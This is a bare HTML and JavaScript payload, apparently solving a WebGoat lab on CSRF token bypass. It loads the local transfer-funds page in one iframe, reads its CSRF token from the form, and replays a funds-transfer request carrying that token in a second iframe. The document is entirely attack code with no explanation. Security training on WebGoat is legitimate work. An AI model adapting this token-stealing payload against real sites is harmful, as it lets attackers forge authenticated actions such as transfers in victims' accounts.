<script language="javascript">
var tokenval;
function readFrame1(){
    var frameDoc = document.getElementById("frame1").contentDocument;
    var form = frameDoc.getElementsByTagName("Form")[0];
    var t = form.CSRFToken.value;
    tokenval = '&CSRFToken='+t;

    loadFrame2();
}

function loadFrame2(){
    var testFrame = document.getElementById("frame2");
    testFrame.src = "http://localhost:8080/WebGoat/attack?Screen=60&menu=900&transferFunds=main"+tokenval;
}
</script>
<iframe src="http://localhost:8080/WebGoat/attack?Screen=60&menu=900&transferFunds=main" onload="readFrame1();"
id="frame1" frameborder="1" marginwidth="0"
marginheight="0" width="800" scrolling=yes height="300"> </iframe>
<iframe id="frame2" frameborder="1" marginwidth="0"
marginheight="0" width="800" scrolling=yes height="300"> </iframe>

